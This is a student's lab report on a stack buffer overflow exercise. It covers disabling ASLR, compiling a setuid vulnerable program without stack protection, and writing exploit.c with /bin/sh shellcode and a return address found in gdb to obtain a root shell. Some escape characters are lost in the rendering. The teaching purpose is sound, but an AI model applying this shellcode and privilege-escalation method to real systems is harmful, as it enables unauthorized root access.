• 2018-2019-1 20165314《信息安全系统设计基础》实验一 缓冲区溢出漏洞实验


    实验目的

    学习体验使用程序缓冲区溢出漏洞改变程序流控制,了解缓冲区漏洞的机理等。

    实验环境配置:

    输入命令安装一些用于编译32位C程序的软件包

    $ sudo apt-get update
    
    $ sudo apt-get install -y lib32z1 libc6-dev-i386
    
    $ sudo apt-get install -y lib32readline-gplv2-dev
    

    初始设置

    1.关闭地址空间随机化功能。(此功能用于随机堆和栈的初始地址,使猜测准确的内存地址变得困难)

    sudo sysctl -w kernel.randomize_va_space=0
    

    2.为了进一步防范缓冲区溢出攻击及其它利用 shell 程序的攻击,许多shell程序在被调用时自动放弃它们的特权,不能在shell中保持root权限,这个防护措施在/bin/bash中实现。设置zsh程序

    $ sudo su
    $ cd /bin
    $ ln -s zsh sh
    $ exit
    

    3.输入“linux32”,进入32位linux环境,输入“/bin/bash”使用bash

    漏洞程序

    1.在/tmp目录下新建一个stack.c文件

    2.stack.c代码:

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    
     int bof(char *str)
     {
     char buffer[12];
     strcpy(buffer, str);
     return 1;
     }       
    
     int main(int argc, char **argv)
     {
      char str[517];
      FILE *badfile;
    
     badfile = fopen("badfile", "r");
     fread(str, sizeof(char), 517, badfile);//读取一个名为“badfile”的文件。
     bof(str);//将文件内容装入到buffer中
    
     printf("Returned Properly
    ");
     return 1;
     }
    

    3.编译过程:

    $ sudo su
    $ gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
    $ chmod u+s stack
    $ exit
    
    • -g 参数是为了使编译后得到的可执行文档能用gdb调试
    • GCC编译器有一种栈保护机制来阻止缓冲区溢出,所以我们在编译代码时需要用-fno-stack-protector关闭用来阻止缓存区溢出的栈保护机制,-z execstack用于允许执行栈

    攻击

    在/tmp目录下新建一个exploit.c文件

      #include <stdlib.h>
      #include <stdio.h>
      #include <string.h>
    
      char shellcode[] =
      "x31xc0" //xorl %eax,%eax
      "x50"     //pushl %eax
      "x68""//sh" //pushl $0x68732f2f
      "x68""/bin"     //pushl $0x6e69622f
      "x89xe3" //movl %esp,%ebx
      "x50"     //pushl %eax
      "x53"     //pushl %ebx
      "x89xe1" //movl %esp,%ecx
      "x99"     //cdq
      "xb0x0b" //movb $0x0b,%al
      "xcdx80" //int $0x80
      ;
    
      void main(int argc, char **argv)
      {
          char buffer[517];
          FILE *badfile;
          memset(&buffer, 0x90, 517);
    
          /* You need to fill the buffer with     appropriate contents here */
          strcpy(buffer,"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x??x??x??x??");   
    
          strcpy(buffer + 100, shellcode);   //将shellcode拷贝至buffer,偏移量设为了 100
          badfile = fopen("./badfile", "w");
          fwrite(buffer, 517, 1, badfile);
          fclose(badfile);
      }
    

    x??x??x??x??处需要添上 shellcode 保存在内存中的地址,因为发生溢出后这个位置刚好可以覆盖返回地址。
    strcpy(buffer+100,shellcode); 这句告诉我们,shellcode 保存在 buffer + 100 的位置。为了得到 shellcode 在内存中的地址,输入命令

      $gdb stack
      $disass main
    

    接着输入命令

    $b *0x080484e8
    $r
    $i r $esp
    

    输入 r 后会Staring program
    输入 i r $esp会显示 str 地址
    然后按 q ,enter 退出调试
    根据语句

    strcpy(buffer + 100,shellcode)
    

    计算 shellcode 的地址;0xffffd060(十六进制) + 0x64(100的十六进制) = 0xffffd0c4(十六进制)
    修改exploit.c文件,将 x??x??x??x?? 修改为 xc4xd0xffxff,根据计算,我所使用的虚拟机的str地址为0xffffd060,exploit.c文件中的x??x??x??x??修改后内容为xc4xd0xffxff。

    编译 exploit.c 程序

    gcc -m32 -o exploit exploit.c
    

    运行攻击程序exploit,再运行漏洞程序 stack,观察结果:

    ./exploit
    ./stack
    

    输入whoami验证是否攻击成功

    作业截图

    1、输入$ sudo sysctl -w kernel.randomize_va_space=2打开系统的地址空间随机化机制,重复用 exploit 程序攻击 stack 程序,观察能否攻击成功,能否获得root权限。

    2、将 /bin/sh 重新指向 /bin/bash(或/bin/dash),观察能否攻击成功,能否获得 root 权限。

    实验中遇到的问题及解决方法

    • 1 将stack.c生成在了主目录,以及某些未知的原因,导致在tmp目录中无法编译运行,并且只能以只读方式打开。
      解决方法:重新做了一遍实验。
    • 2 不是很理解这个实验的攻击原理,实验结束后自己去百度下。
  • 相关阅读:
    POJ 2388
    POJ 2387
    POJ 2389
    POJ 2379
    POJ 2385
    文件及输入输出流模拟ATM机
    文件及输入输出流模拟学生系统
    第六讲 字符串
    第四节课练习
    第四次上课练习
  • 原文地址:https://www.cnblogs.com/zhangshuai9345/p/9788099.html
Copyright © 2020-2023  润新知